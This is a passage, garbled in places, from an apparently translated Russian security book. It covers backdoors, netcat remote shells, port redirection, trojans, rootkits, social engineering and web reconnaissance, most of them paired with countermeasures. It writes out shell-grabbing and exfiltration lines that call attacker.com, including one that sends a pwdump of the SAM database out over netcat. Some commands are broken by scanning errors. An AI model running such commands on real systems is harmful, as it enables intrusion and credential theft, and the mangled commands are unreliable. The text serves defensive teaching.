обнаружить подозрительные демоны. Novell Файлы startup.ncf и autexec.ncf системы NetWare позволяют определить, какие программы, параметры и загружаемые модули системы NetWare (NLM — NetWare Loadable Module) будут запущены при загрузке сервера. Взломщики могут отредактировать один или несколько файлов . NCF, которые вызываются из этих загрузочных файлов (например, файл Idremote.ncf) и, таким образом, создать "потайной ход", например запустить хакерскую программу rconsole. Поэтому периодически проверяйте каждый загрузочный файл, чтобы не упустить момент создания взломщиками "потайного хода". Запланированные задания Например, в системе Windows NT простой "потайной ход" можно реализовать, установив утилиту netcat, которая будет ежедневно запускаться в назначенное время. C:\>at\\192.168.202/44 12:ООА /every:! С помощью этой команды каждый день в полдень будет инициироваться новая программа прослушивания порта 8080. Злоумышленник сможет без проблем подключиться к целевому компьютеру с помощью утилиты netcat и получить в свое распоряжение командную оболочку, периодически удаляя ранее запущенные экземпляры netcat. Кроме того, можно воспользоваться также командным файлом, чтобы сначала проверить, запущена ли утилита netcat, а затем при необходимости осуществить ее запуск. ср /bin/csh /tmp/evilsh
Контрмеры: защита от запланированных заданий Для того чтобы предотвратить эту атаку в системе NT, с использованием команды at проверьте список заданий на предмет наличия в нем несанкционированных заданий. С:\> at Затем с помощью следующей команды завершите подозрительные процессы с идентификатором 0. Удаленное управление Вполне возможна ситуация, когда взломщик не сможет вернуться на целевой компьютер, даже обладая необходимыми регистрационными данными. Это может произойти, если некоторые служебные процессы сервера не выводят приглашения на регистрацию. Например, мало пользы от пароля root, если на взламываемом сервере отключены г-службы или telnet. Точно так же в системе Windows NT администратор по умолчанию получает очень ограниченные возможности удаленного управления. Поэтому первоочередная цель взломщика состоит в обеспечении механизмов повторного доступа. netcat В этой книге ранее уже упоминался "швейцарский армейский нож", утилита netcat (ее версии как для системы NT, так и для UNIX можно найти по адресу http.//www. 10pht.com/~weld/netcat/index.html). С помощью этой программы можно незаметно прослушивать нужный порт, выполняя заранее определенные действия после установки удаленного соединения с системой. Утилита netcat окажется чрезвычайно мощным средством удаленного управления, если эти действия будут направлены на запуск командной оболочки. Затем злоумышленники могут подключиться с помощью netcat к заданному порту и получить в свое распоряжение командную оболочку. Команды запуска netcat в режиме прослушивания обычно скрытно помещаются в какой-нибудь загрузочный файл (см. предыдущий раздел), поэтому эта программа прослушивания портов будет активизироваться при каждой перезагрузке системы. Пример такого "потайного хода" показан на рис. 14.2, на котором виден параметр системного реестра Windows NT, приводящий к запуску утилиты netcat в процессе загрузки системы. Сообразительные взломщики обязательно замаскируют своего "троянского коня" netcat. Для этого можно дать программе какое-нибудь нейтральное имя, например ddedll32.exe, или такое, что администратор дважды подумает, прежде чем удалит такой файл. Параметр -L утилиты netcat дает возможность возобновить работу при многократном нарушении связи; при использовании ~d программа netcat запускается в скрытом режиме (без интерактивной консоли); а -е позволяет задать запускаемую программу, в данном случае командный интерпретатор NT cmd.exe. Параметр -р определяет прослушиваемый порт (в данном примере 8080). Версию программы netcat для системы UNIX можно легко настроить так. чтобы запускалась командная оболочка /bin/sh, что приведет к тому же результату. После этого взломщику останется только соединиться с портом, который прослушивается утилитой netcat, и получить в свое распоряжение удаленную командную оболочку.
remote.exe (NT) Утилиту remote из набора NTRK можно запустить в качестве сервера, чтобы командная строка возвращалась любому аутентифииированному пользователю NT, который подключился с помощью соответствующего удаленного клиента. Эту программу очень просто установить (нужно просто скопировать файл remote.exe в системный каталог, например %systemroot%). Поэтому зачастую ее использование предшествует последующей установке более опасных программ, таких как графические утилиты удаленного управления или программы-регистраторы нажатия клавиш. Более подробно утилита remote.exe описана в главе 5. loki Программы loki и lokid, кратко рассмотренные в главе 11. предоставляют взломщикам простой механизм повторного получения доступа к взломанной системе, даже если она расположена позади брандмауэра. Оригинальность этих программ заключается в том, что клиент (loki) помещает команды взломщика (в основном это пакеты IP) в заголовки ICMP или UDP и отсылает их серверу (lokid), который выполняет их и возвращает результаты. Поскольку многие брандмауэры допускают прохождение на сервер пакетов ICMP и UDP, то инициированный взломщиком трафик зачастую без проблем проходит через брандмауэр. Сервер lokid запускается с помощью следующей команды. Back Orifice и NetBus Хотя оба этих средства по своей природе являются графическими (NetBus даже предоставляет некоторые возможности по управлению рабочим столом), они главным образом удаленно вызывают функции программного интерфейса API. Так что лучше их расценивать их как инструменты создания "потайных ходов", предназначенные для выполнения удаленных команд, а не как графические утилиты удаленного управления. Возможности каждой из этих утилит описаны в главах 4 и 5. Здесь же мы лишь еще раз перечислим те места, в которых взломщики могут скрытно размещать эти средства, чтобы администраторам было легче их разыскать. Контрмеры: защита против Back Orifice (и других программ) Попытки использования Back Orifice (а также служб FTP, telnet, SMTP, HTTP и т.д.) легко обнаружить, используя бесплатную утилиту фирмы Network Flight Recorder, которая называется BackOfficer Friendly (http://www.nfr.net/products/bof/). Эта программа с графическим интерфейсом работает в режиме прослушивания портов и сообщает обо всех попытках соединения с системой. Ее самой замечательной особенностью является режим Fake Replies (ложные ответы). При его использовании программа будет отвечать на telnet-запросы и записывать имена и пароли, с помощью которых взломщики пытаются получить доступ. Как видно из следующего рисунка, программа выполняет большую работу по отслеживанию попыток проникновения в систему. Если известен пароль, то программу ВО2К можно легко удалить на удаленном компьютере. Для этого с помощью клиентского приложения нужно соединиться с сервером, в диалоговом окне раскрыть папку Server Control и выбрать команду Shutdown Server с параметром DELETE. Перенаправление портов: реверсивный ceaнc telnet, netcat, datapipe, rinetd и fpipe В предыдущих разделах некоторые команды удаленного управления, основанные на использовании командного процессора, описывались в контексте прямых соединений. Теперь рассмотрим ситуацию, когда прямому вмешательству в систему что-то препятствует, например прямой доступ блокируется брандмауэром. Изобретательные взломщики могут обойти эти препятствия с помощью перенаправления портов (port redirection). Реверсивный сеанс telnet Один из любимых взломщиками "потайных ходов" во взломанную систему может быть реализован с помощью демона telnet, входящего в комплект поставки многих версий UNIX. Так что эту программу даже не потребуется загружать. Мы называем этот способ реверсивный сеанс telnet, потому что в процессе его реализации утилита telnet используется для соединения с находящейся в режиме прослушивания утилитой netcat, запущенной на компьютере взломщика. Затем требуемые команды направляются на целевой узел, а результаты их выполнения — обратно. С:\> nc -w -1 -р 80 Затем на целевом узле следует использовать следующую команду UNIX, sleep 10000 | telnet 172.29.11.191 80 | В результате входные данные с порта 25 с помощью конвейера будут переданы локальной командной оболочке (которая выполнит полученные команды), а результаты снова через конвейер будут перенаправлены обратно, на порт 80 компьютера взломщика. Порты из предыдущего примера (80 и 25) используются стандартными службами (HTTP и SMTP соответственно). Поэтому обычно следующий через них поток сообщений свободно проходит через брандмауэр на многие внутренние узлы.
Захват командной оболочки с помощью утилиты netcat Если на целевой компьютер можно поместить утилиту netcat, или если она там уже установлена, то можно воспользоваться аналогичным методом. Такой подход мы называем "захват командной оболочки", потому что его суть заключается в том, что на своем рабочем компьютере взломщик получает в полное распоряжение все функциональные возможности удаленной командной оболочки. Рассмотрим пример, когда в удаленной командной строке запускается следующая команда. nс attacker.com 80 | cmd.exe | nс attacker.com 25 Если хакер на своем компьютере attacker.com с помощью утилиты netcat осуществляет прослушивание TCP-портов 80 и 25 и при этом порт 80 разрешает передачу входящих, а порт 25 — исходящих пакетов для компьютера-жертвы через брандмауэр, то эта команда позволяет "захватить" командную оболочку удаленной системы. На рис. 14.3 показан экран компьютера взломщика, где в верхнем окне на порт 80 передается команда ipconf ig, а результаты ее выполнения направляются в порт 25 и отображаются в нижнем окне.
datapipe Реализация перенаправления портов с помощью утилиты netcat и ручная настройка этого процесса может оказаться довольно хлопотным делом. В Internet можно найти несколько программ, которые предназначены специально для этих целей. В системе UNIX очень популярна утилита datapipe. С ее помощью взломщик может обеспечить перенаправление данных так, чтобы пакеты принимались через порт 65000 и переадресовывались в систему NT (порт 139). Далее, на своем компьютере злоумышленник может настроить систему для выполнения прямо противоположных действий: запустить утилиту datapipe для прослушивания порта 139 и перенаправления сообщений на порт 65000 целевой системы. Например, для нападения на систему NT (172. 29.11.100), расположенную позади брандмауэра, на взломанном узле (172.29.11.2) нужно выполнить следующую команду. datapipe 65000 139 172.29.11.100 Затем на собственном компьютере взломщику необходимо запустить утилиту datapipe для прослушивания порта 139 и пересылки полученных данных на порт 65000 взломанного узла. datapipe 139 65000 172.29.11.2 Теперь через брандмауэр открыт доступ к системе NT (172.23.11. ICO). На рис. 14.4 показан пример реализации перенаправления портов и продемонстрирована эффективность этого метода. С помощью такого подхода можно обойти брандмауэры с фильтрацией пакетов, пропускающие сообщения, предназначенные для портов с большими номерами. rinetd Утилита rinetd — это "сервер перенаправления Internet", созданный Томасом Бутеллом (Thomas Boutell). Эта программа перенаправляет соединения TCP с одного IP-адреса и порта на другой. Таким образом, она. во многом похожа на программу datapipe. Программа работает как на базе интерфейса Win32 (включая Windows 2000), так и в системе Linux УТН..ПГ rinetd очень легко использовать: нужно просто создать конфигурационный файл, в котором указывается правило перенаправления. Этот файл имеет следующий формат адрес_привязки порт_прмвязки адрес_соединения порт_соединения Запустить программу можно с помощью команды rinetd -с <имя_конфигурационного_файла>. Так же как и datapipe, эта утилита может оказаться очень эффективной против неправильно настроенного брандмауэра. fpipe Утилита fpipe предназначена для передачи/перенаправления данных с порта TCP. Ее разработали авторы этой книги, занимающие ключевые позиции в компании Foundstone, Inc. Эта программа создает поток TCP. исходящий из выбранного пользователем порта. Она прекрасно подходит для перенаправления, представленного на рис. 14.4, и в системе Windows может послужить равноценной заменой программы datapipe, применимой только к UNIX.
Пользователи должны знать, что, если при задании порта-источника исходящего соединения был использован параметр -в и это соединение было закрыто, может оказаться невозможным установить его повторно (утилита fpipe сообщит, что адрес уже используется) до того момента, пока не истекут интервалы ожидания TIME_WAIT и CLOSE_WAIT, определяемые протоколом TCP. Эти интервалы ожидания могут варьироваться в диапазоне от 30 секунд до четырех минут и более, в зависимости от используемой версии операционной системы и ее версии. Эти интервалы ожидания определяются протоколом TCP и не являются ограничением самой утилиты fpipe. Причина возникновения такой ситуации заключается в том, что утилита fpipe пытается установить новое соединение с удаленным узлом с применением тех же комбинаций локальных IР-адреса/порта и удаленных IP-адреса/порта, что и в предыдущем сеансе. Новое же соединение не может быть установлено до тех пор, пока стеком протоколов TCP не будет решено, что предыдущее соединение не было полностью завершено.
VNC Рассмотренные ранее средства удаленного управления предоставляют возможность практически полного контроля над системой. Поэтому при одной только мысли о возможности получения в свои руки виртуального рабочего стола целевой системы у взломщиков учащается сердцебиение. Программа Virtual Network Computing (VNC) предоставляет именно такие возможности. Кроме того, этот программный продукт легко установить на "захваченной" системе и использовать ее как "потайной ход", обеспечивающий получение доступа впоследствии. Взлом X Windows и других графических терминальных служб На узлах UNIX, на которых не ограничивается исходящий трафик приложения xtenn (TCP 6000). можно модифицировать некоторые из приведенных ранее методов перенаправления портов, чтобы "захватить" окно терминала и перенаправить таким образом оконную командную оболочку обратно на компьютер взломщика. Для этого достаточно запустить Х-сервер, а затем ввести следующую команду. xterrn -display attacker.соm:0.О& С системой Windows придется повозиться немного больше. Не остается ничего другого, как воспользоваться такими продуктами, как Windows Terminal Server или Independent Computing Architecture (ICA) компании Citrix (http://www.citrix.com). С помощью этих компонентов можно организовать конвейер, связывающий удаленный рабочий стол с компьютером взломщика. В отличие от системы NT4, в Windows 2000 терминальный сервер является встроенным компонентом, который входит в комплект поставки. Так что почти наверняка он окажется доступным. Чтобы определить, установлены ли на взломанном удаленном узле терминальные службы, можно воспользоваться утилитой sclist из набора NTRK. После этого с помощью привилегированной учетной записи нужно установить соединение. Ниже показан пример использования утилиты sciist (для краткости полученный листинг сокращен). D:\Toclbox>sclist athena Если оказалось, что на удаленном узле установлены также средства Terminal Services Licensing, то его можно настроить для работы в режиме сервера приложений, а не в режиме сервера удаленного управления. Это может принести взломщику определенную выгоду (компания Microsoft советует устанавливать сервер лицензирования и терминальный сервер на разные компьютеры). Общие контрмеры против "потайных ходов": профилактический осмотр Вы познакомились с многочисленными средствами и методами, к которым прибегают взломщики для создания "потайных ходов". Как же администратор может обнаружить и нейтрализовать оставленные взломщиками следы? Средства автоматизации Как говорится, легче предотвратить, чем обезвредить. Многие современные коммерческие антивирусные программные продукты неплохо работают, автоматически сканируя систему в поисках таких программ. Зачастую они нейтрализуют опасность еще до того, как будет причинен реальный вред (например, до получения доступа к дисководу для гибких дисков или до загрузки вложения электронного сообщения). Достаточно полный перечень производителей антивирусных программ можно найти в статье Q49500 базы знаний компании Microsoft по адресу http://support.microsoft.com/support/ kb/articles/Q49/5/00.ASP. Ведение учета Предположим, что все принятые меры предосторожности не помогли и система все же оказалась взломанной. В такой ситуации единственным оружием против почти всех описанных ранее приемов создания "потайных ходов" является бдительность. Со стороны администратора было бы разумным вести всесторонний учет состояния системы и продумать, где можно быстро разместить надежные данные для восстановления системы. Мы настоятельно рекомендуем выполнять инвентаризацию наиболее важных систем, регистрируя данные как о начальной установке, так и о каждом их обновлении. Кто прослушивает порты Возможно, это очевидно, но никогда не стоит недооценивать мощь утилиты netstat. которая позволяет выявить факт прослушивания портов программами, которые аналогичны рассмотренным выше. Следующий пример демонстрирует полезность этого инструмента (для краткости приводится не весь листинг). D:\Toolbox>netstat-an Интересно, догадается ли читатель, что в приведенном фрагменте не согласуется с изложенными выше фактами? D:\Toolbox>fport Из приведенного листинга видно, что порт с номером 2222 прослушивается утилитой netcat. А при использовании программы netstat можно было бы узнать только номер прослушиваемого порта. Удаление подозрительных процессов Еще одна возможность выявления "потайного хода" заключается в проверке списка процессов на наличие в нем таких исполняемых файлов, как nc, WinVNC. exe и т.д. Для этого в системе NT можно использовать утилиту pulist из набора NTRK, которая выводит все запущенные процессы, или sclist, показывающую работающие службы. Таблица 14.1. Номера портов, используемые программами и удаленного управления при создании "потайных ходов"
Команды pulist и sclist просты в использовании. Их удобно применять в файлах сценариев для автоматизации процесса тестирования как на локальной системе, так и в сети. В качестве примера приведем список процессов, выводимый программой pulist. С:\nt\ew>pulist В следующем примере с помощью утилиты sclist был получен список работающих на удаленном узле служб. C:\nt\ew>sclist \\172.29.11.191 В системе UNIX для аналогичных целей можно использовать команду ps. В каждой версии UNIX имеются свои особенности использования этой команды. В Linux она выглядит как ps -aux, а в Solaris — ps -ef. Эти команды могут и должны быть применены при создании сценариев, служащих для получения отчета об изменениях в списке активных процессов. В число других замечательных инструментов системы UNIX, позволяющих получить соответствие между службами и запущенными процессами, входят программы Isof , которую можно применять в большинстве версий, и sockstat для FreeBSD. Вот пример результатов работы этих утилит. [crush] lsof -i Конечно же, поскольку большинство из рассмотренных выше программ может быть переименовано, без инвентаризации системы и приложений как при их начальной установке, так и при последующих обновлениях, "потайной ход" будет трудно обнаружить (нам кажется, что об этом говорилось уже достаточно). Отслеживание изменений файловой системы Для перегруженных работой администраторов сама мысль о регулярном обновлении полного списка файлов и каталогов может показаться безумной, поскольку это требует намного больших затрат, чем все предыдущие рекомендации. В то же время, если состояние системы изменяется не очень часто, такой учет является самым надежным методом выявления следов злоумышленников. D:\Toolbox>md5sum d:\test.txt>d:\test.md5 К сожалению, программа MDSsum одновременно обрабатывает только один файл (конечно, написав сценарий, это можно исправить). В число более эффективных средств выявления вторжений в файловую систему входит старая программа Tripwire, которую можно найти по адресу http://www.tripwire.com. Таблица 1 4.2. Используемые пo умолчанию имена исполняемых файлов утилит удаленногоуправления
Загрузочный файл и параметры системного реестра Взломщикам было бы неинтересно создавать "потайной ход", если бы после обычной перезагрузки системы или после удаления администратором какой-нибудь необходимой службы, они не имели бы возможности возобновить соединение. Это можно обеспечить, поместив в основных конфигурационных файлах или в системном реестре ссылки на средства создания "потайного хода". Фактически для функционирования многих из упомянутых программ требуется наличие в системном реестре определенных параметров, что значительно облегчает их идентификацию и удаление. Аудит, проверка учетных записей и ведение журналов регистрации Это последняя по порядку, но не по степени важности, контрмера, поскольку невозможно идентифицировать вторжение, если не активизированы средства оповещения. Убедитесь, что подключены встроенные возможности аудита. Например, в NT политику аудита можно настроить с помощью диспетчера пользователей, а в 2000 — с использованием аплета Security Policy. To же самое можно осуществить с помощью утилиты auditpol из набора NTRK. Файловая система NTFS позволяет отслеживать доступ на уровне отдельных файлов. Для этого в окне проводника Windows щелкните правой кнопкой мыши на требуемой папке или на файле, выберите команду Properties, перейдите во вкладку Security, щелкните на кнопке Auditing и настройте нужные параметры. Известно, что в системе NT4 ведение полного аудита приводит к снижению производительности, поэтому многие не пользовались этой возможностью. Однако тестирование Windows 2000 показало, что в этой операционной системе в режиме аудита потребление ресурсов значительно снижено и замедление ее работы неощутимо даже при использовании всех предоставляемых возможностей. Конечно, если журнал регистрации не просматривается регулярно, если его содержимое удаляется из-за недостатка свободного пространства на диске или из-за плохой организации, то даже самый полный аудит окажется бесполезным. Однажды мы посетили Web-узел, который был предупрежден об атаке еще за два месяца до ее реализации. И это случилось только благодаря тому, что некоторые системные администраторы старательно вели журналы регистрации. Чтобы не потерять такую важную информацию, разработайте политику регулярного архивирования журналов регистрации. Многие компании регулярно импортируют их в базы данных, чтобы облегчить процесс поиска и автоматизировать систему оповещения об опасности. |
Программы типа "троянский конь" Как уже упоминалось во введении, "троянский конь" — это программа, которая для вида выполняет какие-нибудь полезные действия, однако на самом деле предназначена совсем для других (зачастую злонамеренных) действий или скрытно устанавливает коварные или разрушительные программы. Многие из рассмотренных выше средств создания "потайных ходов" могут быть помещены во внешне безобидные пакеты, так что конечные пользователи даже не смогут догадаться о том, насколько опасные программы установлены на их компьютерах. В качестве другого примера можно привести коварную программу, маскирующуюся под файл netstat. Эта программа, в отличие от настоящей утилиты netstat, намеренно не показывает некоторые прослушиваемые порты, тем самым скрывая наличие "потайного хода". Ниже вы познакомитесь еще с несколькими примерами программ типа "троянский конь", таких как FPWNCLNT. DLL и "наборы отмычек".
BoSniffer Что может быть лучше, чем инфицирование какой-нибудь системы с помощью программы, предназначенной для поиска "потайных ходов"? Утилита BoSniffer, которая вроде бы призвана выявлять Back Orifice, на самом деле является замаскированной ВО. Так что соблюдайте осторожность при использовании подобных бесплатных средств... К счастью, эту программу можно удалить точно так же, как и обычный сервер ВО (см. разделы выше). eLiTeWrap Очень популярной программой типа "троянский конь" является eLiTeWrap. Она предназначена для "упаковки" многочисленных файлов в один исполняемый файл и последующей их распаковки либо запуска на удаленном узле. Как видно из следующего примера, в такую "обертку" можно поместить также сценарии, что позволяет взломщикам реализовать неповторимые атаки. С:\nt\ew>elitewrap Теперь в распоряжении взломщика появился файл с именем bad.exe. При запуске из него будут извлечены утилиты pwdump.exe, netcat (nc.exe), а затем запустится командный файл attack.bat, в котором содержится простая команда, например pwdump i nc.exe -n 192.168.1.1 3000. В результате база данных SAM системы NT попадет на компьютер взломщика (192 .168 .1.1, на котором утилиту netcat следует настроить на прослушивание порта 3000). С:\nt\ew>find "eLiTeWrap" bad.exe Ключевое слово "eLiTeWrap" может измениться, поэтому при выявлении программы eLiTeWrap не следует полностью полагаться на этот признак.
Библиотека FPWNCLNT . DLL для Windows NT Одна из тайных задач программ типа "троянский конь" состоит в их маскировке под системный компонент регистрации в системе и захвате имен/паролей пользователей. Одним из примеров реализации такого подхода является библиотека FPNWCLNT.DLL, устанавливаемая на серверы NT, на которых требуется выполнять синхронизацию паролей с системами Novell NetWare. Эта библиотека перехватывает изменения паролей перед тем, как они будут зашифрованы и записаны в базу данных SAM, что позволяет службам NetWare получить пароли в удобочитаемом виде, обеспечивая тем самым единую форму регистрации. Контрмеры Если нет необходимости в синхронизации паролей между системами NT и NetWare, удалите файл FPNWCLNT.DLL из каталога %systemroot*\system32. Следует проверить также поддерево системного реестра HKEY_LOCAL_MACKINE\SYSTEM\CurrentControlSet\ Control\Lsa\Notificaion Packages (REG_MULTI_SZ) и удалить из него строку FPNWCLNT. Если эта динамически подключаемая библиотека все же необходима для работы в смешанной среде, сравните атрибуты используемого файла с атрибутами его проверенной копии (например, содержащейся на установочном компакт-диске) и убедитесь, что это исходная версия компании Microsoft. Если возникли какие-то сомнения, лучше восстановить данный файл с проверенного носителя. |
Разрушение системного окружения: "наборы отмычек" и средства создания образа состояния системы До сих пор речь шла о многочисленных способах размещения в системе скрытых ловушек, чтобы обычные пользователи даже и не догадывались о том, что же происходит на самом деле. Многие представленные концепции касались средств, работающих под видом обычных программ (несмотря на зловредность выполняемых ими действий), которые скрывались в таких местах, где их легко найти. К сожалению, взломщики способны на более зловредные поступки, в чем вы очень скоро убедитесь. Из-за того, что профессиональное знание архитектуры операционных систем в настоящее время стало нормой, полное нарушение целостности системы становится тривиальной задачей. "Наборы отмычек" Что произойдет, если под контролем взломщика окажется сам код операционной системы? Предпосылки такого подхода появились еще в те времена, когда компиляция ядра UNIX иногда выполнялась еженедельно, если система плохо была настроена или находилась на началъном этапе установки. Естественно, что наборы программ, которые вместо обычных двоичных файлов операционной системы встраивают компоненты типа "троянский конь", получили название "наборов отмычек". Такие средства обеспечивают самую большую дискредитацию взламываемого компьютера. В главе 8 были описаны "наборы отмычек", предназначенные для системы UNIX, которые обычно состоят из четырех групп инструментов, адаптированных под конкретную платформу и версию операционной системы: (1) программы типа "троянский конь", например такие, как измененные версии login, netstat и ps; (2) программы, предназначенные для создания "потайных ходов", например вставки в файл inetd; (3) программы перехвата потока данных в сети; (4) программы очистки системных журналов. Контрмеры против "наборов отмычек" Если оказалось, что нельзя доверять даже командам Is или dir, значит, пришло время признать себя побежденным: создайте резервные копии важных данных (но только не двоичных файлов!), удалите все программное обеспечение, а затем переустановите его с проверенных носителей. Не следует особо надеяться на резервные копии, поскольку абсолютно неизвестно, когда именно взломщик пробрался в систему. После восстановления программное обеспечение также может оказаться "троянизированным". net start_root_ net stop_root_ He упускайте из вида такие наиболее опасные компоненты "наборов отмычек", как программы-анализаторы сетевых пакетов. Эти средства перехвата данных обладают особым коварством, поскольку способны "на лету" перехватывать сетевой трафик в процессе выполнения обычных операций. Создание образа системного окружения для нейтрализации механизма проверки контрольных сумм Существует несколько средств для создания зеркального образа системных томов (табл. 14.3). Эти мощные утилиты помогают сэкономить время и при возникновении внештатной ситуации могут оказаться просто незаменимыми. Однако их побитовая точность фиксирования состояния системы может быть использована для того, чтобы обвести вокруг пальца механизмы обеспечения безопасности, основанные на проверке контрольных сумм текущих системных данных. Таблица 14.3. Некоторые технологии копирования состояния системы и связанные с ними программные продукты
Контрмеры Физическая безопасность всегда должна быть во главе списка защитных мероприятий любой информационной системы. Двери с надежными замками могут предотвратить атаки, направленные на копирование или клонирование системных данных. |
Социальная инженерия Последний раздел этой главы посвящен методу, наводящему наибольший ужас на тех, кто отвечает за сохранность информации,— социальной инженерии (social engineering). Хотя этот термин прочно закрепился в хакерском жаргоне, обозначая метод убеждения и/или обмана сотрудников какой-либо компании для получения доступа к ее информационным системам, мы считаем его неудачным. Такие приемы обычно применяются в процессе обычного человеческого общения или при других видах взаимодействия. В качестве технических средств обычно выбирается телефон, но попытка наладить общение может быть предпринята и через электронную почту, коммерческие каналы телевидения или другие самые разнообразные способы, позволяющие вызвать нужную реакцию. Успешному взлому с применением социальной инженерии, как правило, предшествуют следующие стандартные подходы. Необразованный пользователь и "справочный стол" Однажды авторы, проявив достаточную настойчивость, просмотрели списки контактных данных сотрудников компании, адреса электронной почты и номера телефонов внутренней телефонной сети одной компании. Все это оказалось возможным благодаря обращению к "справочному столу" этой компании. "Справочный стол" и растерянный пользователь В предыдущем примере было интересно наблюдать за тем, какое гипнотизирующее влияние маска руководителя оказала на стоящих на более низком уровне сотрудников "справочного стола". Однако в некоторых компаниях, где технические знания персонала "справочного стола" дают им возможность получать от сотрудников любую информацию, этот метод можно применить несколько по-другому и добыть сведения от ничего не подозревающих пользователей. Однажды, найдя на одном из Web-узлов список внутренних телефонов компании и представляясь работником отдела внутренней технической поддержки, авторы начали обзванивать сотрудников, выбирая телефоны случайным образом. Таким образом удалось получить информацию об именах пользователей и паролях доступа к внутренним файлам, а также некоторые общие сведения о локатьной сети. Эту информацию предоставляли 25% из тех, кому звонили. Выдавая себя либо за директора отдела информационных технологий, либо за сотрудника группы технической поддержки можно с высокой эффективностью извлекать необходимые данные. Контрмеры В этой главе описаны самые разнообразные атаки. Некоторые из них выглядят безграничными в своих проявлениях, и кажется, что их очень трудно предотвратить (например, поиск информации в открытых источниках Internet). Хотя противодействовать всем атакам с применением социальной инженерии почти невозможно, мы постарались все же сформулировать некоторые рекомендации, которые могут оказаться эффективными.
|
Резюме В этой главе вы познакомились со способами захвата соединений TCP в сети с множественным доступом, а также с тем, как взломщики могут получить доступ к системе,, передавая команды для локального выполнения или путем перехвата соединения. Эти типы атак очень просто реализовать в сетях с множественным доступом и так же просто предотвратить при переходе к сети с коммутацией пакетов.
И наконец, вы узнали о социальной инженерии и ее возможностях по нарушению системы обеспечения безопасности организации. Как сказано в документе RFC 2504, "Паранойя — это очень хорошо". Убедитесь, что каждый, кто работает с важными данными, осознает свою ответственность. |
Глава 15. УЯЗВИМОСТЬ В WEB
|
Уязвимость в WEB Тысячи компаний осознали, что всемирная паутина Web является мощным средством распространения информации, расширения торговли, улучшения качества обслуживания и поддержки постоянного контакта с заказчиками и клиентами. И хотя большинство организаций для защиты своих интересов и вложений предусмотрительно использует фильтрующие маршрутизаторы, брандмауэры и системы выявления вторжений, когда речь заходит об изъянах Web, многие из этих мер предосторожности могут оказаться бесполезными. Почему? Большинство из обсуждаемых в этой главе атак реализуется через порты Web (80, 81, 443, 8000, 8001, 8080 и т.д.). Хотя их не так много, обычно они открывают доступ в сегмент сети, доступный из Internet. Некоторые читатели, дочитавшие главу до конца, удивятся, узнав, каким грозным орудием может оказаться Web-броузер в руках взломщика. |
Воровство в Web В главе 1 описан предварительный сбор данных, позволяющий получить максимально полную информацию об отдельном узле или обо всей сети в целом. Воровство в Web преследует практически ту же цель. В поисках информации взломщики вручную просматривают Web-страницы, стараясь найти недостатки в коде, зацепки в комментариях и дизайне. В этом разделе приведено несколько способов такого сбора информации о Web-сервере. В число этих методов входит последовательный просмотр страниц вручную, применение сценариев автоматизации и коммерческих программ. Последовательный просмотр страниц Один из давно известных способов получения данных заключался в прохождении всего Web-узла вручную, просматривая в броузере исходный код каждой страницы. В документах HTML можно найти огромное количество информации, включая ценные комментарии, адресованные другим разработчикам, адреса электронной почты, номера телефонов, программы JavaScript и многое другое. Например, задав в броузере адрес какого-нибудь сервера и выбрав команду View^Page Source, можно увидеть исходный код HTML (рис. 15.1).
Упрощай! К крупным Web-узлам (содержащим более 30 страниц) большинство взломщиков применяют автоматизированный подход, используя специальные сценарии или утилиты. Сценарии можно писать на различных языках, однако авторы отдают предпочтение языку Perl. С помощью несложных программ на этом языке можно перемещаться по Web-серверу, осуществляя поиск определенных ключевых слов.
Эта программа позволяет задавать также слова, которые необходимо найти. Контрмеры против воровства в Web 1. Регулярно анализируйте содержимое журналов регистрации и следите за повышением количества запросов GET, поступающих из одного и того же источника. |
Поиск известных изъянов Как всегда, особое внимание следует уделять очевидным брешам в системе защиты. Это необходимо в основном потому, что и хакеры обращают на них внимание в первую очередь. Несколько разрушительных изъянов Web существует до сих пор, хотя о них стало широко известно еще несколько лет назад. Отличительной особенностью атак этого типа является то, что многие из них легко обнаружить. Сценарии автоматизации, применяемые новичками В данный момент как никогда уместна фраза "Пусть друзья будут рядом, а враги — еще ближе". Используемые в основном начинающими взломщиками, сканирующие сценарии (чаще всего написанные известными хакерами) зачастую могут помочь в обнаружении некоторых известных изъянов. Многие средства поиска таких брешей можно найти на Web-узле компании Technotronic (www.technotronic.com). Phfscan.c Изъян PHF (более подробно описанный ниже) был одной из первых применяемых для взлома брешей в сценариях Web-серверов. Этот изъян позволяет взломщику локально запускать любую команду, как если бы он был пользователем Web-сервера. Часто это приводит к тому, что файл паролей /etc/passwd оказывается загруженным на компьютер взломщика. В выявлении такого изъяна как администратору, так и хакеру, может помочь несколько программ и сценариев. Программа pfhscan.c является одной из наиболее популярных. Перед использованием ее нужно откомпилировать (gcc phfscan.c -о phfscan), подготовить список узлов, которые нужно просканировать (для создания такого списка подойдет утилита gping), назвать файл со сгенерированным списком host.phf и поместить его в один каталог с программой. После запуска двоичного файла (phfscan) программа начнет выдавать предупреждения о найденных уязвимых серверах. cgiscan.c cgiscan — это удобная небольшая утилита, созданная в 1998 году Бронком Бастером (Bronc Buster). Она предназначена для сканирования узлов и поиска среди них тех, которые подвержены старым изъянам, таким как PHF, count, cgi, test-cgi, PHP, handler, webdist.cgi, nph-test-cgi и многих других. Программа осуществляет поиск уязвимых сценариев в тех каталогах, где они обычно находятся, и пытается ими воспользоваться. Результат работы утилиты выглядит примерно следующим образом. [root@funbox-b ch!4]# cgiscan www.somedomain.com В Internet можно найти десятки сценариев, предназначенных для сканирования. На узле http://www.hackingexposed.com/ содержатся ссылки на самые популярные Web-узлы, на которых содержится самая разнообразная информация по вопросам безопасности. |
Приложения автоматизации В Internet можно найти несколько приложений, предназначенных для автоматизированного поиска хорошо известных изъянов или тех из них, которые становятся доступными при использовании в процессе установки программного обеспечения параметров, предлагаемых по умолчанию. В отличие от сценариев, эти средства используются вручную. Это не позволяет использовать их в больших корпоративных сетях, зато они успешно применяются в малых сетях и на серверах, на которые нужно обратить более пристальное внимание. Grinder Программа Grinder версии 1.1 (http://hackersclub.com/km/files/hfiles/ rhino9/grinderll .zip), поддерживает интерфейс Win32 и позволяет сканировать IP-адреса из заданного диапазона. Результатом ее работы является отчет, в котором содержится название и версия Web-сервера. Это ничем не отличается от применения обычной команды HEAD (например, утилиты netcat), однако в процессе сканирования программой Grinder создается несколько параллельных сокетов, поэтому она работает намного быстрее. На рис. 15.3 показано, как Grinder выполняет сканирование и определяет версии Web-серверов.
После завершения работы сканера будет создан файл, содержащий отчет о версии Web-сервера. 172.29.11.82 port 80: Server: Microsoft-IIS/4.0
